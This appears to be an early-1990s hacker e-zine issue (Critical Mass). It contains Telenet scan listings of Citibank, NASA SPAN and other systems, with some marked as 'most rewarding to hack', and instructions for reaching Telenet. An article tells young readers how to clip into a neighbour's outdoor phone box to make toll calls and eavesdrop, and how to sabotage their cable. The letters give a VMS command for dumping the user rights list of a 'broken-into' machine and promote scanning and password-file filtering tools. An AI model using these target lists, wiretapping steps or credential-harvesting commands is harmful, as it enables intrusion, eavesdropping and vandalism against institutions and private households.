22448 - "CONNECTED TO 03 35-50" - Prime running PrimOS
22449 - CitiBank Of Frankfurt
22450 - CitiCorp/Citibank MainFrame.. Location Unknown
22451 - CitiCorp Cash Management Service Server
22452 - CitiBank Of Latino, Mexico - Network Access
22453 - JERSEY_COSMOS, CitiBank.. Prime running PrimOS
22455 - CitiBank Of Brasil
*22456 - "GFNA Mid-Range Data Center", server. Whats nice about this place
is, yes, it serves more CitiCorp systems, but though the server
itself <Such as service "ts1">, you can get to DECServers <Well,
ripoffs of DECServers>
22457 - VAX/VMS
22458 - CitiBank Of Venezuela <COSMOS>
22459 - Unknown, Asks for terminal Emulation then goes goofy
22460 - CitiBank Of Kuala Lumpur<?>
22461 - CitiBank Of Sidney, Australia
22462 - CitiCorp Of Singapore
22463 - CitiBank Of Manila
22464 - Prime Running PrimOS
22465 - CitiBank Of Singapore
*22468 - VCP DECServer Ripoff.
22469 - CitiBank Of Singapore
22471 - CitiCash Manager
*22473 - VCP Server, with tons of CitiCorp Machines!
22474 - CitiCash VTAM Server
22475 - Unknown, Locks up
22476 - Unknown, Gives Garbage
22477 - Unknown, Locks Up
22478 - CitiBank Of Hong Kong
22479 - CitiCorp Cash Management Service Server, In Silver Springs, MD
22480 - Unknown, Locks up
22481 - Unknown CitiBank.. Locks at present time...
22482 - Prime running PrimOS
22483 - Some Weird Emulation Server
22484 - CitiBank Of Hong Kong
22485 - CitiBank Of Hong Kong
22486 - Prime Running PrimOS
*22487 - Yet Another DECServer, with tons of CitiCorp Machines
22489 - Prime Under PrimOS
22491 - Prime <OBSPOM> Under PrimeOS
22493 - Says, "HOLA" just as it disconnects
22495 - "BMS==>", Unknown
22497 - CitiBank Of Hong Kong
22498 - N.Y. Citicorp Cash Management, "*** WELCOME C/C/M *** INT'L 4"
224100 - CitiSwitch , New York
224104 - "BMS==>" , Unknown
224105 - "TYPE ." , Unknown
224108 - "*** WELCOME TO C/C/M *** INT'L 6 ***"
224125 - "PLEASE ENTER TRANSACTION ID:"
224128 - Prime (LATPRI), PrimOS
224132 - Primt (PROD-B), PrimOS
224139 - VAX/VMS
224140 - VAX/VMS
224141 - ":", Unknown
224142 - WELCOME TO C/C/M, Citicorp Cash Management. N.Y.
224143 - Citi Cash Management
224145 - Unknown, Locked at time of scan
224147 - WELCOME TO C/C/M <Citi Cash Management?>
224148 - CitiBank Of London
*224150 - DEC Gateway
224152 - Corporate Audit BBS <Login as New>
224153 - Citi Cash Management Network
224155 - Prime (PROD-B), PrimOs
*224157 - VCP-1000 <DECServer Ripoff>
224158 - Come Back To this one!
224159 - CDS Data Processing Support CitiCorp
Center (718)248-1000
224160 - Connects The Disconnects
224161 - Vax/VMS
224162 - NUA 31109040000601, Prime - PrimOS
224163 - Prime under PrimOS
241644 - Prime under PrimOS (WINMIS)
*224165 - Strange, But sorta neat server, type "?" for help.
224167 - Global Treasury Products, VAX/VMS
224168 - Global Rport From CitiCorp
224170 - Electronic Check Manager, CitiBank United Kingdom?
224172 - CitiMail Asia Pacific (CMAP)
224174 - Personal Services & Technologys
Data PABX Network
(212) 319-5911 for 1200bps
9600 (v.29) (516)420-4946
9600 (v.32) (516)420-4971
2400 (2120319-5946
For "Citi-Users"
224175 - "enter a for astra", Unknown
*224176 - CitiCorp DECServer 500
224177 - VAX/VMS, Fairly secure.
224179 - Network? theres a big FAT Warning at front door!
224183 - Prime under PrimOS
224184 - Prime under PrimOS (PROD-C)
224186 - CitiBank Of Hong Kong
*224188 - CitiTrust/WIN Gateway! Another on of
strange networks.. Type "?" for
help.
224191 - Unknown, CitiPC.
224193 - ":", Unknown.
224194 - CitiShare, Milwaukee, Wisconsin.
System/32, VOS
*224196 - Xyplex X.25 Gateway. Huge Server
224199 - Gives Garbage Then Disconnects
224200 - Connects/Disconnects
224203 - CitiBank Hong Kong - COMOS
224204 - Unknown
224205 - Prime Under PrimOS
224206 - Hong Kong Flight Depatures - NEAT!
224207 - Comunication SubSystems for Intercon.
CSFI
224209 - CitiBank of Na Brunei
224210 - CitiBank, New York, Ny. System/88
224212 - Citi Master Policy BBS
224213 - Unknown
224216 - VAX/VMS
224219 - CitiBank Nordic, Stockholm
224223 - CitiBank of Singapore
224227 - Unknown
224230 - Unknown
224261 - Busy At Time Of Scan - Still Busy
224300 - Refuse Collect Calls
224503 - CitiCorp, Japan <System /32 under VOS>
224506 - CitiCorp - Unknown <System /32 under VOS>
224521 - CitiBank of Hong Kong
---------------------------------------------------------------------------
Systems marked '*' are the most rewarding systems to hack in my opinion
List compiled 'The Beaver')
_____________________________________________
The SAOO Telenet Directory
The "Thousand" Scan
By The Beaver
______________________
-----------------------------------------------------------------------------
Information on Telenet:
The First thing you need to do is obtain a dial up list. To do
this, call 1-800-424-9494 <1200 7E1, or 1200 8N1 with high bit
striping on>. Once on, you will receive a "TERMINAL=", which at
this point, enter your terminal type, or just press return <TTY>.
You will now get a "@" prompt. From here type "c mail". At
the "Username?" prompt, enter "phones" and the same for the
"Password?" prompt. At this point, simply follow the directions,
and you will get your local dialup<s>. One thing I would like to
note, when using the 300/1200 dialups, when you connect, simply hit
return a few times. When using the 2400 dialups, you must enter "@"
followed by a carriage return.
For more information on Telenet, I advise you to get
Hacker's Unlimited issue#1 or LOD/H Technical Journal for more
information on Telenet. I did not wish to make this a text file on
Telenet, but rather a directory of listings scanned by myself and
fellow S.A.O.O members. These texts can be obtained via The Tower
of Power BBS <668-6745> and The Speed Shop <XXX-XXXX) 14.4k
-----------------------------------------------------------------------------
Ok, the following is what I call the "Thousand" scan. I know that
if you are on UnRegNet you have probably seen this scan, but for the
people who have not, this is what was hit during that scan. <These scan
points to no origin, and there are lots of interconnecting machines, but
due to the articles sake, we will not include all those interconnecting
machines>.
Address Information
-----------------------------------------------------------------------------
1020 - Unknown, Freezes
1021 - Unknown, hangs
1022 - Hangs
1023 - Hangs
1024 - Hangs
1025 - Hangs
1026 - Hangs
1027 - Hangs
1028 - Hangs
1029 - Hangs
2011 - Refuse Collect Calls
2021 - PrimeNet
2022 - PrimeNet
2155 - Refuse Collect Calls
2193 - Prime
2194 - Prime
2195 - Prime
2196 - Prime
2197 - Prime
2198 - Prime
2199 - Prime
2231 - Refuse Collect Calls
2236 - Unknown... "Invalid Transaction Identification"
2241 - CitiBank <223 90118>
2242 - Global Report VAX/VMS <223 90093>
2243 - Global Report From CitiCorp <223 90000> Send Break to get menu
2244 - Prime Net <223 91054>
2246 - CitiBank Of Canada
2245 - CitiBank Of Canada - <223 90158>
2247 - Global Report From Citibank - Unknown <223 90000>
2248 - Citibanking Turkey <223 91296>
3054 - Martin Mariettia
3210 - NPSS <Nasa Packet Switching System> <321 7202>. SPAN Net.
3211 - NPSS <321 2092>
3212 - NPSS <321 7202>
3213 - NPSS <321 2092>
3214 - NPSS <321 7202>
3215 - NPSS <321 7202>
3216 - NPSS <321 7202>
4045 - possible pad with no password?
4100 - MCI
4155 - Refuse Collect Calls
4157 - UnKnown - Possible Prime machine
4660 - Refuse Collect Calls
4661 - Refuse Collect Calls
4663 - Refuse Collect Calls
4664 - Refuse Collect Calls
4665 - Refuse Collect Calls
4666 - Refuse Collect Calls
4667 - Refuse Collect Calls
4668 - Refuse Collect Calls
4669 - Refuse Collect Calls
5124 - Refuse Collect Calls
5128 - Refuse Collect Calls
5650 - Refuse Collect Calls
5651 - Refuse Collect Calls
5652 - Refuse Collect Calls
5653 - Refuse Collect Calls
5654 - Refuse Collect Calls
5655 - Refuse Collect Calls
5656 - Refuse Collect Calls
5657 - Refuse Collect Calls
5658 - Refuse Collect Calls
5659 - Refuse Collect Calls
6220 - Refuse Collect Calls
6221 - Refuse Collect Calls
6222 - Refuse Collect Calls
6223 - Refuse Collect Calls
6224 - Refuse Collect Calls
6225 - Refuse Collect Calls
6226 - Refuse Collect Calls
6227 - Refuse Collect Calls
6228 - Refuse Collect Calls
6229 - Refuse Collect Calls
6260 - Refuse Collect Calls
6261 - Refuse Collect Calls
6262 - Refuse Collect Calls
6263 - Refuse Collect Calls
6264 - Refuse Collect Calls
6265 - Refuse Collect Calls
6266 - Refuse Collect Calls
6267 - Refuse Collect Calls
6268 - Refuse Collect Calls
6269 - Refuse Collect Calls
7144 - Refuse Collect Calls
7470 - UnKnown... "ENTER USERID>" - Some Private network
7471 - Same
7472 - Same
7473 - Same
7474 - Same
7475 - Same
7476 - Same
7477 - Same
7478 - Same
7479 - Same
7520 - Refuse Collect Calls
7521 - Refuse Collect Calls
7522 - Refuse Collect Calls
7523 - Refuse Collect Calls
7524 - Refuse Collect Calls
7525 - Refuse Collect Calls
7526 - Refuse Collect Calls
7527 - Refuse Collect Calls
7528 - Refuse Collect Calls
7529 - Refuse Collect Calls
7550 - Refuse Collect Calls
7551 - Refuse Collect Calls
7552 - Refuse Collect Calls
7553 - Refuse Collect Calls
7554 - Refuse Collect Calls
7555 - Refuse Collect Calls
7556 - Refuse Collect Calls
7557 - Refuse Collect Calls
7558 - Refuse Collect Calls
7559 - Refuse Collect Calls
7860 - Refuse Collect Calls
7861 - Refuse Collect Calls
7862 - Refuse Collect Calls
7863 - Refuse Collect Calls
7864 - Refuse Collect Calls
7865 - Refuse Collect Calls
7866 - Refuse Collect Calls
7867 - Refuse Collect Calls
7868 - Refuse Collect Calls
7869 - Refuse Collect Calls
7870 - Unknown Prime
7871 - UnKnown Prime
7872 - Unknown Prime
Note: NUA 3210 <NASA SPAN network> ranges from 321X to 321XXXXXX.
All of these NUA's will be NASA SPAN Networks.
------------------------------------
Basic Anarchy For The Youngsters
By Penial Implant
------------------------
I have read a lot of hacking (phreaking, carding, pirating, etc.. too)
computer magz and I enjoy the READING a lot, HOWEVER, I am 13 and most
of the shit in the articles, while PHUN AS PHUCK to read and wish I could
do, the fact is If a chemist working at a chemical outlet saw a 13 year old
with a list of Sulfuric acid, Nitric acid, and glycerol (Ingredients to
nitroglycerin for those unfamiliar) naturally they would get somewhat
suspicious, so I have decided to submit MY article about:
WHAT 13 YEAR-OLDS (OR ADULTS WHO ARE UN-WILLING TO DO THE OTHER SHIT)
CAN DO THAT IS PHUN AS PHUCK
1.) Phreaking:
This is a slightly technical thing but so easy it is worth
it to try, Ya' know the side of your house (and everyone elses) that has
all those wires running in and out of the house? well it is usually
on the right side and It controls CATV (Cable), Phone services, and some
other uninteresting shit (like electricity in some cases) well the obvious
thing to do is use this to your advantage.
1. a.) Using The Phone Box:
Once you know where the green box outside on the wall is, it is the
cube that is hollow plastic and has a single nut in the center. Inside
of this is the phone in and outputs of their house (for most people)
there is 2 wires each attached to a screw looking thing (usually one red
and the other is green).
1. a. I.) How To Use This To Your Advantage:
You must build a VERY simple circuit. What you do is go to Radio Shack (or any
place where you can buy phone shit, Sam's has best prices) and purchase
a phone wire (at least 3ft. long but if its too short you will be confined, and
too long it will be cumbersome). Then get a hold of some alligator clips (I know
that Radio Shack has good prices on these helpful devices).
Directions:
1st: Cut the wire in two
2nd: Remove a few inches (3"-5") of that beige/yellow jacket on the wire
to expose the Red, Yellow, Green, & Black wires
3rd: Strip these wires
your wire should look like this
Red
Modular Plug | _ Green
[]=======================|<_ Yellow
|
Black
4th: Now put an alligator clip on each of the exposed wires
You have now completed the simplest hardware device of your Phreaking collection
All you have to do now is buy one of those cheap phones that all the guts are
contained in the headpiece and the base just has a wire running along the
bottom, take the base off of the wire and take the wire out of the phone
and insert the modular end of your wire into the now open port on the phone.
1. b.) Using The 'Lineman Circuit' With The Phone Box:
Go out late at night (2:00am is about right) and roam around town until you
find a suitable victim, preferably someone you hate When you find
him/her go to the side of their house and open the box by unscrewing the nut.
You may need some pliers, but 90% of the time you will be able to use your
hands (Sometimes there will even be a piece of paper stating their phone
number). Clip your clips onto the apprepriate post (Green to Green,
and Red To Red is usually all there will be). Make sure when you do this that
the hangup button is down so if (at 2:00 am) someone using
the phone doesn't detect you. Then Press the 'MUTE' Buton and keep it down
and release the hang up button. Check to see if there is a dialtone, if
there is, we're in business if not you didn't securley clip the clips on the
post (DO THAT!!!, AND start over from the 'mute' part). If you hear someone
speaking it is sooooooooooooo phun to hear the conversation someone has at 2
in the morning (you could hear 1-900, drug deals all sorts of shit).
1. b. I.) What You Can Do When You Get A Dial Tone:
1. You can make toll calls
2. Prank calls (the Sherriff, Police, FBI, CIA, White House, and
Kremlin are my faves)
And if you have a Laptop w/modem you can call log distance boards
2.) Fucking Around With Their Cable:
You can easily disconnect their cable and deprive trekkies of Star Trek or
Perverts of XXX movies or whatever, and after about 2 days they will be
willing to pay YOU money to get it up-and-running
although the sheer joy of watching your enemies be miserable should be payment
enough. And if you are a real thrill seeker, you can pump shit into their TV with
a camcorder you can pretend to be a terrorist taking over the TV network
or some shit like that.
Submitted by Penile Implant
_______________________________
Letters
_____________________
From: XXXXXXXXXXXXXX
To: The Beaver
Subj: telnet
Greetings, fellow CompuDude....
I have un problem....
I called that 1-800-424-9494 # at 12007E1 and all I got was a 'you have
dialed a number that is not avalable from your calling area 205-5T' message.
Any suggestions?
}-----RAVEN----->
Date: 21-Sep-92 06:06
From: The Beaver
To: XXXXXXXXXXXXXXX
Subj: Re: telenet
I will have to check it out... try one of these numbers....
800-546-1000
564-2000
564-6000
Actually, the first one might really be 564, if not 546.. Try it,
and if it don't work try the others... But considering that you will be
coming in on a WATS telenet PAD, your range with be limited.. Try these
other local dial ups for more range..
1200 bps only
7E1 or 8N1 with high bit stripping o
n...
681-1902 though 681-1907 <On Rotary>
2400 bps, same settings as above.
561-8830
Thoughs will give you better range. If you are planing on checking
out some of the NUA's given in CM#7, keep in mind that they do go bad....
Though the list should be fairly fresh and you should hit very little, to no
problems. If you are planning on doing your own scans, I believe I neglected
to mention, but Tscan Version 1.1i Beta will not work on slow machines.
I tested it on my 386/20 and it works fine. Plus there are a few other bugs,
but nothing big, and Tscan2.0i will be out within the next week or two and
will have all bugs fixed, plus it is compatable with a batch more scan,
scan, randomized telenet port dialing, and will run on slower machines
<Currently works on a 8086 / 8.> Welp, tell me what ya find and have a
blast! Chow!
---==<Beaver>==---
< Note: Since This Writting, Tscan2.1 has been released and does support >
< slower machines, but not terrible well though, and there is a bug >
< on the sending of Terminal breaks if used on ports above com1 >
< This is explected to be fixed on version 2.5i or the TomSwift >
< hacker term.....Which ever comes first >
From: XXXXXXXXXXX
To: The Beaver
Subject: CMASS shit
Hey beav,
I d/led the CMASS 7 from Spellbook earlier. Truthfully, it sucked. HAHA
NOT! No really it was more than i expected! Well if you are interested in me
being a part of the SAOO (cuz i am interested), then please (polite eh?) leave
me whatever your supposed to leave me for application. Call XXX-XXXX voice,
and if you like ill let you on to my bbs. Also, can you give me more info on
how that telenet scanner works? ive read the docs, and there kinda confusin.
Also i have no idea what that Phill shit is, but i copied it to my utility
directory anyhow. Annnnnnnnnnnnnnnnnnnnnnnnnd... well hmm... now what was i
gonna say...oh what are those numbers for the , Speed Shop,
and SAOO Main BBS? they all say 904-pri-vate. There's 1 more, i cant think
of. Can you give me the numbers to all the private ones if you are allowed
to? Ill fill out some application if i must...i was on your bbs back in
march, last thing you told me was you got C++ and it was 10 megs and you would
post it, but ya hadta get a bigger drive and BOOM there goes the upper deck.
Anyway, please get back to me on all of the above shit. Thanx!!!!!!!!!!
From: The Beaver
To: XXXXXXXXXXX
Subject: CMASS#7
Welp, Tscan1.0i and Tscan1.1i are a little buggy, so I advise down-
loading version 2.1i, because of the fact that it will work on slower
machines if need be.
I understand that the DOC's where rather confusion, and I hope
the the doc's in version 2.1i will explain a little bit more, and clear
up somethings....... I advise that you run it on the fastest machine
you have avalible to you, so that it scan clean. If you have version
2.1i, the best way to figure out how it works is to just watch it in
action. Execute Tscan2.1 and make sure that your setup is right. Once you
are sure of that, go to the "Start Scan" selection.. Now it will ask for
a Starting Address <NUA)and a ending.... Just to see how it works, scan
212000 - 212999. After watching it for a while, you will probably get the
hang of what it going on.
About phill.. It is what as know as a VAX/VMS Rightslist filter.
What is a rightslist? Simple, it is a file that stores the rights for
users. What does this mean? On a VAX/VMS, this is where you can obtain
all the users on the computer that you have just broken into. The major
problem is that once you download <Or capture> the rightslist, it tends
to be a little messy. That is where programs like Phill, RlFilter, and
RIF come in. They take out the garbage in the Rightslist. I will probably
have a article in the future discussing this in more detail, but for
those familar with VMS, the Rightslist can be obtained in the following
way......
Type sys$common:[sysexe]rightslist.dat
Don't forget to open a capture buffer!
About the BBS's....................
I cannot give the fone numbers out to you, but I will point you in the
right direction......
Contact Shadow Hacker, Electrode or myself about the Speed Shop
<Running on a Amiga >. We can be reached on any UnRegNet BBS, through UnRegNet.
There are a few other boards you might wish to get on, but considering that
I cannot vouch for these BBS's, I probably should not release there phone
numbers........ You will have to get them your own way...
The following is a list of current SAOOWear Releases, that you
can find on some of the BBS's previously listed.
Phill v2.0 - VAX/VMS Rightslist Filter.
Iwar v1.0Beta - Intelligent Wargame Dialer V1.0 Beta.
determines remote OS's for you.
<Find De Bugs Version>
Tscan v2.1 - SAOO Telenet Scanner V2.1
DvBoot v1.0 - Automatic window closer for DesqView
UnixFlt v1.0 - Filters Unix Passwd files, leaving only
the usernames behind.
Noted Bugs:
It seems that the "Clear Modem Buffer" routines in the beta
version of Iwar v1.0 causes some machines to crash.
In Tscan v2.1, there is a bug in where terminal breaks are not
sent when using com ports other than com 1.
This concludes yet another issue of Critical Mass. As usual, I
hope you enjoyed it, and will be looking forward to the next Issue.
Hopefully we can get the next issue out faster than it took to get this
issue... In the next issue of Critical Mass, expect more NUA scans
on Telenet, along with Down And Dirty Chemistry Part 2 and much more!
- Critical Mass Tech Support -
